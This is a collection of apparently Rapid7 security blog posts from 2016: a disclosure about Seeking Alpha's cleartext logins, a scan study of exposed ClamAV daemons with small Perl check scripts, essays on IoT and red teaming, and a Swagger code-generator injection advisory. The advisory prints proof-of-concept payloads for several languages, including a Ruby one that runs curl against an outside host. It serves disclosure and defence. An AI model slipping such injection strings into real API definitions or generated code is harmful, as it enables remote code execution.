In addition, HTTP is used for the authentication sequence. The user's full e-mail address, password, and HTTP session tokens are transmitted in the clear, as are less critical elements such as the fingerprintable User-Agent (which reveals build and platform information).

 

In this sample, a user's login information (username and password) may be obtained using a simple packet capture:

 

Mobile device characteristics can also be retrieved (Android OS version and Android Device Token are present):

 

Furthermore, persistent session information (the user ID, email address and the session token aka “user_remember_token”) is clearly visible:

 

Stock ticker symbols are also included (either when added, or when receiving portfolio holdings, which may include positions per symbol if the user has entered those):

 

Curiously, HTTPS requests to https://seekingalpha.com using a normal browser on a traditional PC or laptop are also redirected to HTTP services, rather than the reverse. This includes the authentication sequence. This observation suggests that the preference for HTTP over HTTPS permeates the engineering practices at Seeking Alpha.
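
One simple way to check for this kind of HTTPS-to-HTTP downgrade yourself is to request the HTTPS URL without following redirects and inspect the Location header. Below is a rough Perl sketch using LWP::UserAgent; it is only an illustration, and the site's behavior may well have changed since this disclosure:

#!/usr/bin/perl
# Check whether an HTTPS URL answers with a redirect back to plain HTTP.
# Requires LWP::Protocol::https for HTTPS support. Illustrative only; the
# target's behavior may have changed since this post was written.
use strict;
use warnings;
use LWP::UserAgent;

my $url = shift @ARGV || 'https://seekingalpha.com/';
my $ua  = LWP::UserAgent->new(max_redirect => 0, timeout => 10);

my $res      = $ua->get($url);
my $location = $res->header('Location') || '';

if ($res->is_redirect && $location =~ m{^http://}i) {
    print "Downgrade: $url redirects to $location\n";
} else {
    printf "No HTTP downgrade detected (HTTP status %s)\n", $res->code;
}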

Mitigation

Until Seeking Alpha provides a fix for the mobile application, users are strongly advised to not use the application while connected to untrusted networks. The use of a VPN will also help alleviate the most likely risk of a nearby eavesdropper on a public network, but note that this would protect communication only as far as the VPN endpoint.

Disclosure Timeline

This vulnerability is being disclosed in accordance with Rapid7's disclosure policy.

 

  • Tue, May 03, 2016: Initial contact to security@seekingalpha.com and other aliases.
  • Wed, May 19, 2016: Confidential disclosure to CERT (VR-142).
  • Wed, Jul 13, 2016: Public disclosure (planned).


A little over a week ago some keen-eyed folks discovered a feature/configuration weakness in the popular ClamAV malware scanner that makes it possible to issue administrative commands such as SCAN or SHUTDOWN remotely—and without authentication—if the daemon happens to be running on an accessible TCP port. Shortly thereafter, Robert Graham unholstered his masscan tool and did a summary blog post on the extent of the issue on the public internet. The ClamAV team (which is a part of Cisco) did post a response, but the reality is that if you're running ClamAV on a server on the internet and misconfigured it to be listening on a public interface, you're susceptible to a trivial application denial of service attack and potentially susceptible to a file system enumeration attack since anyone can try virtually every conceivable path combination and see if they get a response.

 

Given that it has been some time since the initial revelation and discovery, we thought we'd add this as a regular scan study to Project Sonar to track the extent of the vulnerability and the cleanup progress (if any). Our first study run was completed and the following are some of the initial findings.

 

Our study found 1,654,211 nodes responding on TCP port 3310. As we pointed out in our recent National Exposure research (and as Graham noted in his post) a great deal of this is "noise". Large swaths of IP space are configured to respond "yes" to "are you there" queries to, amongst other things, thwart scanners. However, we only used the initial, lightweight "are you there" query to determine targets for subsequent full connections and ClamAV VERSION checks. We picked up many other types of servers running on TCP port 3310, including approximately:

 

  • 16,000 squid proxy servers
  • 600 nginx servers (20,000 HTTP servers in all)
  • 500 database servers
  • 600 SSH servers

 

But, you came here to learn about the ClamAV servers, so let's dig in.

 

Clam Hunting

 

We found 5,947 systems responding with a proper ClamAV response header to the VERSION query we submitted. Only having around 6,000 exposed nodes out of over 350 million PINGable nodes is nothing to get really alarmed about. This is still an egregious configuration error, however, and if you have this daemon exposed in this same way on your internal network it's a nice target for attackers that make their way past your initial defenses.
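
For reference, the VERSION check itself is trivial: clamd accepts newline-terminated commands over the TCP socket with no authentication, which is exactly the exposure at issue. Here is a minimal Perl sketch of a single-host check - only run it against systems you are authorized to test:

#!/usr/bin/perl
# Minimal clamd VERSION check against a single host on 3310/TCP.
# Only run this against systems you are authorized to test.
use strict;
use warnings;
use IO::Socket::INET;

my $host = shift @ARGV or die "Usage: $0 <host>\n";

my $sock = IO::Socket::INET->new(
    PeerAddr => $host,
    PeerPort => 3310,
    Proto    => 'tcp',
    Timeout  => 5,
) or die "Could not connect to $host:3310\n";

# clamd reads newline-terminated commands and requires no authentication,
# which is the root of the exposure described above.
print $sock "VERSION\n";
my $banner = <$sock>;
close $sock;

print defined $banner ? "Response: $banner" : "No response received\n";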

 

5,947 is a small enough number that we can easily poke around at the data a bit to see if we can find any similarities or learn any lessons. Let's take a look at the distribution of the ClamAV versions:

 

You can click on that chart to look at the details, but it's primarily there to show that virtually every ClamAV release version is accounted for in the study, with some dating back to 2004/2005. If we zoom in on the last part of the chart, we can see that almost half (2,528) of the exposed ClamAV servers are running version 0.97.5, which itself dates back to 2012. While I respect Graham's guess that these may have been unmaintained or forgotten appliances, there didn't seem to be any real pattern to them as we looked at DNS PTR records and other host metadata we collected. These all do appear to have been just "set and forget" installs, reinforcing our findings in the National Exposure report that there are virtually no barriers to entry for standing up or maintaining nodes on the internet.

 


 

A Banner Haul

 

Now, not all VERSION queries responded with complete banner information, but over half did, and said response banner contains both the version string and the last time the scanner had a signature update. Despite the poor network configuration of the nodes, 2,930 (49.3%) of them were at least current with their signatures, but 346 of them weren't, with a handful being over a decade out of "compliance." We here at Rapid7 strive to stay within the rules, so we didn't poke any deeper to try to find out the signature (or further vulnerability) status of the other ClamAV nodes.

 


 

As we noted above, we performed post-scan DNS PTR queries and WHOIS queries for these nodes, but this exercise proved to be less than illuminating. These are nodes of all shapes and sizes sitting across many networks and hosting providers. There did seem to be a large commonality of these ClamAV systems running on hosts in "mom and pop" ISPs and we did see a few at businesses and educational institutions, but overall these are fairly random and probably (in some cases) even accidental ClamAV deployments.

 

As a last exercise, we grouped the ClamAV nodes by autonomous system (AS) and tallied up the results. There was a bit of a signal here that you can clearly see in this list of the "top" 10 ASes:

 

AS | AS Name | Count | %
4766 | KIXS-AS-KR Korea Telecom, KR | 1,733 | 29.1%
16276 | OVH, FR | 513 | 8.6%
3786 | LGDACOM LG DACOM Corporation, KR | 316 | 5.3%
25394 | MK-NETZDIENSTE-AS, DE | 282 | 4.7%
35053 | PHADE-AS, DE | 263 | 4.4%
11994 | CZIO-ASN - Cruzio, US | 251 | 4.2%
41541 | SWEB-AS Serveisweb, ES | 175 | 2.9%
9318 | HANARO-AS Hanaro Telecom Inc., KR | 147 | 2.5%
23982 | SENDB-AS-KR Dongbu District Office of Education in Seoul, KR | 104 | 1.7%
24940 | HETZNER-AS, DE | 65 | 1.1%

 

Over 40% of these systems are on networks within the Republic of Korea. If we group those by country instead of AS, this "geographical" signal becomes a bit stronger:

 

Rank | Country | Count | %
1 | Korea, Republic of | 2,463 | 41.4%
2 | Germany | 830 | 14.0%
3 | United States | 659 | 11.1%
4 | France | 512 | 8.6%
5 | Spain | 216 | 3.6%
6 | Italy | 171 | 2.9%
7 | United Kingdom | 99 | 1.7%
8 | Russian Federation | 78 | 1.3%
9 | Japan | 67 | 1.1%
10 | Brazil | 62 | 1.0%

 

 

What are some takeaways from these findings?

 

  • Since there was a partial correlation to exposed ClamAV nodes being hosted in smaller ISPs it might be handy if ISPs in general offered a free or very inexpensive "hygiene check" service which could provide critical information in understandable language for less tech-savvy server owners.

  • While this exposure is small, it does illustrate the need for implementing a robust configuration management strategy, especially for nodes that will be on the public internet. We have tools that can really help with this, but adopting solid DevOps principles with a security mindset is a free, proactive means of helping to ensure you aren't deploying toxic nodes on the internet.

  • Patching and upgrading go hand-in-hand with configuration management and it's pretty clear almost 6,000 sites have not made this a priority. In their defense, many of these folks probably don't even know they are running ClamAV servers on the internet.

  • Don't forget your security technologies when dealing with configuration and patch management. We cyber practitioners spend a great deal of time pontificating about the need for these processes but often times do not heed our own advice.

  • Turn stuff off. It's unlikely the handfuls of extremely old ClamAV nodes are serving any purpose, besides being easy marks for attackers. They're consuming precious IPv4 space along with physical data center resources that they just don't need to be consuming.

  • Don't assume that if your ClamAV (or any server software, really) is "just internal" that it's not susceptible to attack. Be wary of leaving egregiously open services like this available on any network node, internally or externally.

 

Fin

 

Many thanks to Jon Hart, Paul Deardorff & Derek Abdine for their engineering expertise on Project Sonar in support of this new study. We'll be keeping track of these ClamAV deployments and hopefully seeing far fewer of them as time goes on.

 

Drop us a note at research@rapid7.com or post a comment here if you have any questions about this or future studies.

Nearly every conversation I have had around the Internet of Things (IoT) and what it means to an organization starts off with the question, “What is IoT?” This question is often followed by many people giving many different answers. I'm sure I won't solve this problem here in a single blog post, but I hope to add some food for thought.

 

What IoT is Not

 

You would expect to start off with a list of things that make up IoT, but I was thinking maybe the first thing is to define what it is not, if that is even doable. Reading through a 2014 article in NetworkWorld, “Eight Internet Things That are Not IoT” we find the following list of items analysts have listed as not being IoT:

 

  • Desktops
  • Laptops
  • Tablets
  • Smartphones
  • Traditional Mobile Phones
  • TVs
  • DVD/MP3 players
  • Game consoles

 

This list demonstrates how fast technology is evolving.  While it was a pretty solid list when it was created two years ago, I think we can all agree that today, it's no longer accurate. Significant technological innovations in a number of these items means they are now considered either to be IoT in themselves, or directly tied to an IoT ecosystem. For example, smart TVs have the ability to watch us, record our every move, and communicate that information to a cloud API over the Internet. They also allow us to communicate and control them via voice and applications on our laptops, tablets, and smartphones.

 


 

Though the article discussed what is not classified as IoT based on its physical purpose, or requiring human interaction, it has quickly become outdated. Using this information, we can conclude that given the rate of innovation, what isn't categorized as IoT today, may very well be tomorrow, so trying to define what isn't IoT isn't necessarily the best direction to go in.

 

Traits of IoT

 

Maybe the better way to answer “What is IoT?” is by defining the functions that make something IoT, although this process has its own issues. For example, to be classified as part of IoT, must a device communicate with the Internet? If we use that as a litmus test, a large number of technologies currently classified as IoT and in use in industrial and enterprise environments would not meet the requirement.

 

After reading through a number of documents, papers, and definitions on the matter, I have identified four common elements that typically characterize IoT:

 

  • Interrelated devices: IoT environments always consist of multiple interrelated systems and technologies which can include: gateways, sensors, actuators, mobile technology, cloud systems and host systems.
  • Collecting and sharing data: IoT technology is always found to collect and/or share data from sensors and controllers. This data may be as simple as audio commands from your smart TV to the cloud, or as sensitive as data from a temperature sensor used to control a high-pressure boiler system within a SCADA environment.
  • Networked together: IoT systems are always network interconnected. This is required to facilitate the exchange of data between the interrelated devices that make up an IoT environment.
  • Embedded electronics: Embedded electronics is the corner stone of the IoT. Their specialized functionality and reduction in size has helped fuel the growth of IoT. Without it, IoT would not exist.

 

Devices vs. Ecosystem

 

Of course, these four items on their own do not completely define IoT, or better stated, do not completely define the IoT ecosystem. Before we dig into the remainder of this definition, let's explore the concept of an IoT ecosystem. This is key to understanding IoT - we should not consider the technology as stand-alone devices, but rather as elements of a rich, interconnected, technological ecosystem. In a previous blog I stated the following:

 

“ecosystem—this is where we consider the entire security picture of IoT, and not just one facet of the technology.”

 

The ecosystem encompasses all of the interrelated parts that make an IoT solution work. Based on that, I believe any device or technology can be part of an existing IoT ecosystem, including desktop computers. If we try to label any technology as “not IoT,” we are going to end up either rewriting the rules six months down the road or failing outright when we try to properly define security risks as they relate to deployed IoT solutions. The better approach is to understand what an IoT ecosystem is so that we can more effectively define risks and develop solutions to mitigate them.

 

Traits of an IoT Ecosystem

 

As I said before, IoT is not about stand-alone devices, and if we try to approach it that way we will fall short in trying to secure it. IoT is an ecosystem that encompasses multiple devices (physical and virtual), technologies (mobile, cloud, etc.), communication methods (Ethernet, Wifi, Zigbee, etc.), and locations (Internet, cloud, remote monitoring and control).

 

Continuing down that path, the following five bullets expand on the Traits of IoT listed above. Not all of them need to be present, but I typically find that at least a couple of these items apply to every IoT ecosystem I have encountered.

 

  • Mobile technology
  • Multiple end nodes (sensors, actuators)
  • Cloud APIs
  • Multiple communication methods (Ethernet, Wifi, Zigbee, Bluetooth, ZWave)
  • Remote Monitoring or Control

 

I believe that by combining the two lists above into a series of questions, we can identify the most common traits that make up an IoT ecosystem and see it as a whole; a short sketch of capturing the answers follows the list below. In the end, by properly understanding and identifying the ecosystem, we can better test, maintain, and secure our rapidly expanding IoT world.

 

  • Which interrelated devices interact as part of this IoT environment?
  • How and where do they collect and share data?
  • Which technologies are networked together?
  • Which systems utilize embedded electronics?
  • Does it use mobile technology? How and where?
  • Are multiple end nodes (sensors, actuators) being used?
  • What and where are the Cloud APIs and how do they interrelate?
  • Are multiple communication methods (Ethernet, Wifi, Zigbee, Bluetooth, ZWave) being used? Which ones?
  • What systems and locations use remote monitoring or control?
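To make these questions concrete, here is a minimal sketch of how the answers could be captured as a structured inventory that can be reviewed as a deployment changes. It uses the smart TV scenario from earlier; the field names and values are my own illustrative choices, not a formal schema.

// A minimal sketch (illustrative only): the ecosystem questions above,
// answered for a hypothetical smart TV deployment and captured as a plain
// JavaScript object so the inventory can be reviewed or diffed over time.
const smartTvEcosystem = {
  interrelatedDevices: ["smart TV", "mobile app", "home router", "vendor cloud"],
  dataCollectedAndShared: ["voice commands", "viewing history", "diagnostics"],
  networkedTogether: ["TV <-> vendor cloud API", "mobile app <-> vendor cloud API"],
  embeddedElectronics: ["TV system-on-chip", "remote control microcontroller"],
  mobileTechnology: "iOS/Android control app",
  endNodes: ["microphone", "IR receiver", "ambient light sensor"],
  cloudApis: ["vendor telemetry API", "voice recognition API"],
  communicationMethods: ["Ethernet", "Wifi", "Bluetooth"],
  remoteMonitoringOrControl: ["mobile app", "vendor cloud portal"]
};

console.log(JSON.stringify(smartTvEcosystem, null, 2));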

 

Hopefully I have given some food for thought and we can work on answering the bigger question, “What is the IoT ecosystem and how do we secure it?” I would love to hear your thoughts on this subject as we work together to secure the world of IoT.

In a fight between pirates and ninjas, who would win? I know what you are thinking: “What in the world does this have to do with security?” Read on to find out, but first, make a choice: Pirates or Ninjas?

 

Before making that choice, we must know what the strengths and weaknesses are for each:

 


Pirates

Strengths:
  • Strong
  • Brute-Force Attack
  • Great at Plundering
  • Long-Range Combat

Weaknesses:
  • Loud
  • Drunk (Some say this could be a strength too)
  • Can be Careless

Ninjas

Strengths:
  • Fast
  • Stealthy
  • Dedicated to Training
  • Hand-to-Hand/Sword Combat

Weaknesses:
  • No Armor
  • Small

 


 

It comes down to which is more useful in different situations. If you are looking for treasure that is buried on an island and may run into the Queen's Navy, you probably do not want ninjas. If you are trying to assassinate someone, then pirates are probably not the right choice.

 

The same is true when it comes to Penetration Testing and Red Team Assessments. Both have strengths and weaknesses and are more suited to specific circumstances. To get the most value, first determine what your goals are, then decide which best corresponds with those goals.

 

Penetration Testing

 

Penetration testing is usually lumped under one big umbrella with all other security assessments. Many people do not understand the differences between a Penetration Test, a Vulnerability Assessment, and a Red Team Assessment, so they call them all Penetration Testing. This is a misconception. While they may share components, each one is different and should be used in a different context.

 

At its core, real Penetration Testing is testing to find as many vulnerabilities and configuration issues as possible in the time allotted, and exploiting those vulnerabilities to determine the risk they pose. This does not necessarily mean uncovering new vulnerabilities (zero days); more often it means looking for known, unpatched vulnerabilities. Like a Vulnerability Assessment, a Penetration Test is designed to find vulnerabilities and verify that they are not false positives. However, Penetration Testing goes further, as the tester attempts to exploit a vulnerability. This can be done in numerous ways, and once a vulnerability is exploited, a good tester will not stop. They will continue to find and exploit other vulnerabilities, chaining attacks together, to reach their goal. Each organization is different, so this goal may change, but it usually includes access to Personally Identifiable Information (PII), Protected Health Information (PHI), and trade secrets. Sometimes this requires Domain Administrator access; often it does not, or Domain Administrator access alone is not enough.

 

Who needs a penetration test? Some regulations and standards, such as SOX and HIPAA, require one, but organizations already performing regular internal security audits and implementing security training and monitoring are likely ready for a penetration test.

 

Red Team Assessment

 

A Red Team Assessment is similar to a penetration test in many ways but is more targeted. The goal of a Red Team Assessment is NOT to find as many vulnerabilities as possible; the goal is to test the organization’s detection and response capabilities. The red team will try to get in and access sensitive information in any way possible, as quietly as possible. A Red Team Assessment emulates a malicious actor who targets specific objectives and works to avoid detection, similar to an Advanced Persistent Threat (APT). (Ugh! I said it…) Red Team Assessments are also normally longer in duration than Penetration Tests. A Penetration Test often takes place over 1-2 weeks, whereas a Red Team Assessment may run 3-4 weeks or longer and often involves multiple people.

 

A Red Team Assessment does not look for as many vulnerabilities as possible, only for the vulnerabilities that will achieve its goals. The goals are often the same as those of a Penetration Test. Methods used during a Red Team Assessment include Social Engineering (Physical and Electronic), Wireless, External, and more. A Red Team Assessment is NOT for everyone, though; it should be reserved for organizations with mature security programs. These are organizations that have penetration tests done regularly, have patched most vulnerabilities, and have generally positive penetration test results.

 

The Red Team Assessment might consist of the following:

 

A member of the Red Team poses as a FedEx delivery driver and accesses the building. Once inside, the Team member plants a device on the network for easy remote access. This device tunnels out over a common port allowed outbound, such as port 80, 443, or 53 (HTTP, HTTPS, or DNS), and establishes a command and control (C2) channel to the Red Team’s servers. Another Team member picks up the C2 channel and pivots through the network, possibly using insecure printers or other devices to draw attention away from the planted device. The Team members keep pivoting until they reach their goal, taking their time to avoid detection.

 

This is just one of the innumerable ways a Red Team may operate, but it is a good example of the kind of test we have performed.

 


 

So... Pirates or Ninjas?

 

Back to pirates vs. ninjas. If you guessed that Penetration Testers are pirates and Red Teams are ninjas, you are correct. Is one better than the other? Often Penetration Testers and Red Teams are the same people, using different methods and techniques for different assessments. The true answer to Penetration Test vs. Red Team is just like pirates vs. ninjas: one is not necessarily better than the other. Each is useful in certain situations. You would not want to use pirates for stealth operations, and you would not want to use ninjas to sail the seas looking for treasure. Similarly, you would not want to use a Penetration Test to judge how effective your incident response is, and you would not want to use a Red Team Assessment to discover as many vulnerabilities as possible.

This disclosure addresses a class of vulnerabilities in Swagger code generators in which injectable parameters in a Swagger JSON or YAML file facilitate remote code execution. The vulnerability applies to the NodeJS, PHP, Ruby, and Java generators, and probably to other languages as well. Other code generation tools may also be vulnerable to parameter injection and could be affected by this approach. By leveraging this vulnerability, an attacker can embed arbitrary code in a client or server that is generated automatically to interact with the service definition. This is an abuse of trust in the definition of service, and could be an interesting space for further research.

 

According to swagger.io - “Swagger is a simple yet powerful representation of your RESTful API. With the largest ecosystem of API tooling on the planet, thousands of developers are supporting Swagger in almost every modern programming language and deployment environment. With a Swagger-enabled API, you get interactive documentation, client SDK generation, and discoverability.”

 

Within the Swagger ecosystem, there are fantastic code generators designed to automagically take a Swagger document and generate stub client code for the described API. This is a powerful part of the solution that makes it easy for companies to give developers the ability to quickly make use of their APIs. Swagger definitions are flexible enough to describe most RESTful APIs and give developers a great starting point for their API client. The problem discussed here is that several of these code generators do not take into account the possibility of a malicious Swagger definition document, which results in a classic parameter injection with a new twist on code generation.

 

Maliciously crafted Swagger documents can be used to dynamically create HTTP API clients and servers with embedded arbitrary code execution in the underlying operating system. This is possible because some parsers/generators trust insufficiently sanitized parameters within a Swagger document when generating a client code base.

  • On the client side, a vulnerability exists in trusting a malicious Swagger document to create any generated code base locally, most often in the form of a dynamically generated API client.
  • On the server side, a vulnerability exists in a service that consumes Swagger to dynamically generate and serve API clients, server mocks and testing specs.

Client Side

swagger-codegen contains a template-driven engine to generate client code in different languages by parsing a Swagger Resource Declaration. It is packaged or referenced in several open source and public services provided by smartbear.com, such as generator.swagger.io, editor.swagger.io, and swaggerhub.com. Other commercial products include restlet.com (restlet-studio) and restunited.com. These services appear to generate and store (but not execute) these artifacts, which can then be publicly downloaded and consumed. Remote code execution is achieved when the downloaded artifact is executed on the target.

Server Side

Online services that consume Swagger documents and automatically generate and execute server-side applications, test specs, and mock servers also provide a potential for remote code execution. Some identified commercial platforms that follow this model include vRest.io, ritc.io, restunited.com, stoplight.io, and runscope.com.

Credit

These issues were discovered by Scott Davis of Rapid7, Inc., and reported in accordance with Rapid7's disclosure policy.

Exploitation

Please see the associated Metasploit exploit module for examples in the following languages.

swagger-codegen

Swagger-codegen generates client and server code based on a Swagger document, which it trusts to supply inline variables in the generated code unescaped (i.e., unescaped handlebars template variables). The javascript, html, php, ruby, and java clients were tested for parameter injection vulnerabilities; examples are given below.
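For orientation, each of the fragments below lives inside an ordinary Swagger 2.0 document. A minimal, benign skeleton (illustrative only, not taken from the proof-of-concept files) looks roughly like the following; the injected strings in the examples land in the keys of 'paths', the 'info' strings, and the 'description' fields under 'definitions'.

// A minimal, benign Swagger 2.0 skeleton (illustrative only), expressed as a
// NodeJS object. The per-language examples below inject into string fields
// like these: info.title, info.description, the keys of "paths", and
// definitions.<name>.description.
const minimalSwaggerDoc = {
  swagger: "2.0",
  info: { title: "Example API", description: "Example description", version: "1.0.0" },
  host: "api.example.com",
  basePath: "/v1",
  paths: {
    "/widgets": {
      get: { responses: { "200": { description: "OK" } } }
    }
  },
  definitions: {
    Widget: { type: "object", description: "A widget" }
  }
};

console.log(JSON.stringify(minimalSwaggerDoc, null, 2));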

javascript (node)

Strings within keys inside the 'paths' object of a Swagger document can be written in the following manner and generate executable NodeJS.

"paths": {        
     "/a');};};return exports;}));console.log('RCE');(function(){}(this,function(){a=function(){b=function(){new Array('": {

 

html

Strings within the 'description' object of a Swagger document can be written with html 'script' tags, and loaded unescaped into a browser.

"info": {        
     "description": "<script>alert(1)</script>",

 

php

Strings within the 'description' object in the definitions section of a Swagger document can inject comments and inline php code.

"definitions": {        
     "d": {            
          "type": "object",            
          "description": "*/ echo system(chr(0x6c).chr(0x73)); /*",

 

ruby

Strings in 'description' and 'title' of a Swagger document can be used in unison to terminate block comments, and inject inline ruby code.

"info": {        
     "description": "=begin",
     "title": "=end `curl -X POST -d \"fizz=buzz\" http://requestb.in/1ftnzfy1`"

java

Strings within keys inside the 'paths' object of a Swagger document can be written in the following manner and generate executable Java.

"paths": {        
     "/a\"; try{java.lang.Runtime.getRuntime().exec(\"ls\");}catch(Exception e){} \"": 

 

Mitigations

Until code generators are patched by their maintainers, users are advised to carefully inspect Swagger documents for language-specific escape sequences.

 

Fixes need to be implemented by those creating code generation tools; in general, they do not apply to the Swagger documents themselves. The mitigation for all of these issues is to properly escape parameters before injecting them, taking into account the context in which each variable is used during inline code creation, and to sanitize untrusted input so that trusting an API specification cannot lead to remote code execution in the known, easily avoidable cases.

 

For example, using double brackets ({{) instead of triple brackets ({{{) in handlebars templates will usually prevent many injection attacks that rely on single- or double-quote termination. However, this will not stop a determined attacker when variables are injected without sanitization logic into multi-line comments, inline code, or other variables.
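To illustrate the difference, here is a minimal sketch using the npm handlebars package and an invented one-line template (the real swagger-codegen templates are more involved); the payload is a shortened stand-in for the proof-of-concept strings above.

// A minimal sketch; assumes the npm "handlebars" package, and the template
// line is invented for illustration rather than taken from swagger-codegen.
const Handlebars = require("handlebars");

// Shortened stand-in for a malicious summary/description value.
const spec = { summary: "a'); console.log('RCE'); ('" };

// Triple-stash: the value is emitted verbatim, so the quote-termination
// payload becomes part of the generated source.
const unescaped = Handlebars.compile("api.get('{{{summary}}}');");
console.log(unescaped(spec)); // api.get('a'); console.log('RCE'); ('');

// Double-stash: quotes are HTML-encoded (&#x27;), which defeats simple quote
// termination, but not comment or multi-line injection as noted above.
const escaped = Handlebars.compile("api.get('{{summary}}');");
console.log(escaped(spec));

Note that the double-stash protection is HTML entity encoding, which is only incidental when the target language is not HTML; the proper fix is context-aware escaping in the generator templates.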

 

Mustache templates

  • {{{ code }}} or {{& code}} can be vulnerable in template and sanitization logic
  • {{ code }} can be vulnerable given context language of template (e.g. block quote)

Where to be wary

  • inline code creation from variable
  • single ticks (') and quotes (") unescaped variable injection
  • block comment (initiator & terminator) injection

Where it gets tricky

  • Arbitrary Set delimiter redefinition {{=< >=}} <={{ }}=>
  • Runtime Partial templates {{> partial}}
  • set redefinition with alternate unescape {{=< >=}} <&foo> <={{ }}=>

What to do in general

  • prefer escaped variables always {{foo}}
  • enforce single-line for commented variables // {{foo}}
  • sanitize ' & " in variables before unescaped insertion
  • encode ', in single quoted path strings.
  • encode ", in double quoted path strings

 

It is recommended to consider usage of a sanitization tool such as the OWASP ESAPI.
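As a rough sketch of what pre-insertion sanitization can look like for the cases listed above (quote escaping, block-comment stripping, and single-line enforcement), consider something like the following. This is illustrative only, not a replacement for a vetted encoder such as the ESAPI.

// A rough, illustrative sanitizer for values destined for unescaped template
// slots: escapes quotes, removes block-comment markers, and collapses
// newlines so single-line comments stay single-line. Not a substitute for a
// vetted library such as the OWASP ESAPI.
function sanitizeForCodegen(value) {
  return String(value)
    .replace(/\\/g, "\\\\")      // escape backslashes first
    .replace(/'/g, "\\'")        // escape single quotes
    .replace(/"/g, '\\"')        // escape double quotes
    .replace(/\/\*|\*\//g, "")   // remove block-comment initiators/terminators
    .replace(/[\r\n]+/g, " ");   // keep the value on a single line
}

// The PHP payload shown earlier, neutralized:
console.log(sanitizeForCodegen("*/ echo system(chr(0x6c).chr(0x73)); /*"));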

For the time being, a Github Pull Request is offered here.

Disclosure Timeline

This vulnerability advisory was prepared in accordance with Rapid7's disclosure policy.

  • Tue, Apr 19, 2016: Attempted to contact the vendor and the API team at Swagger.io.
  • Mon, May 09, 2016: Details disclosed to CERT (VU#755216).
  • Thu, Jun 16, 2016: Proposed patch supplied to CERT.
  • Wed, Jun 23, 2016: CVE-2016-5641 assigned by CERT.
  • Thu, Jun 23, 2016: Public disclosure and Metasploit module released.
  • Thu, Jun 23, 2016: Fix offered to swagger-codegen.

 

Future of Swagger

As of January 1, 2016, the Swagger Specification has been donated to the Open API Initiative (OAI) and forms the foundation of the OpenAPI Specification. However, the name ‘Swagger’ is still the preferred naming at many a dinner party and in many a dad joke, and it is used in this document to refer to an OAS 2.0 specification document. In the typical case, a Swagger document defines a RESTful API and implements a subset of JSON Schema Draft 4.

Tomorrow, Adobe is expected to release a patch for CVE-2016-4171, which fixes a critical vulnerability in Flash 21.0.0.242 that Kaspersky reports is being used in active, targeted campaigns. Generally speaking, these sorts of pre-patch, zero day exploits don't see a lot of widespread use; they're too valuable to burn on random acts of hacking.

 

So, customers shouldn't be any more worried about their Flash installation base today than they were yesterday. However, as I explained almost a year ago, Flash remains a very popular vector for client side attacks, so we recommend you always treat it with caution, and disable it when not needed. This announcement is a great reminder to do that.

 

Since Flash's rise as a popular vector for exploitation, many organizations have taken defensive steps to ensure that Flash has the same click-to-play protections as Java in their desktop space, so those enterprises are in a better position to defend against this and the next Adobe Flash exploit.

 

Our product teams here at Rapid7 are alert to this news and will be working up solutions in Nexpose and Metasploit to cover this vulnerability; this blog will be updated when those checks and modules are available. For Nexpose customers in particular, if you’ve opted into Nexpose Now, you can easily create dashboard cards to see all of your Flash vulnerabilities and the impact that this vulnerability has on your risk. You can also use Adaptive Security to set up a trigger for the vulnerability so that Nexpose automatically launches a scan for it as soon as the check is released.
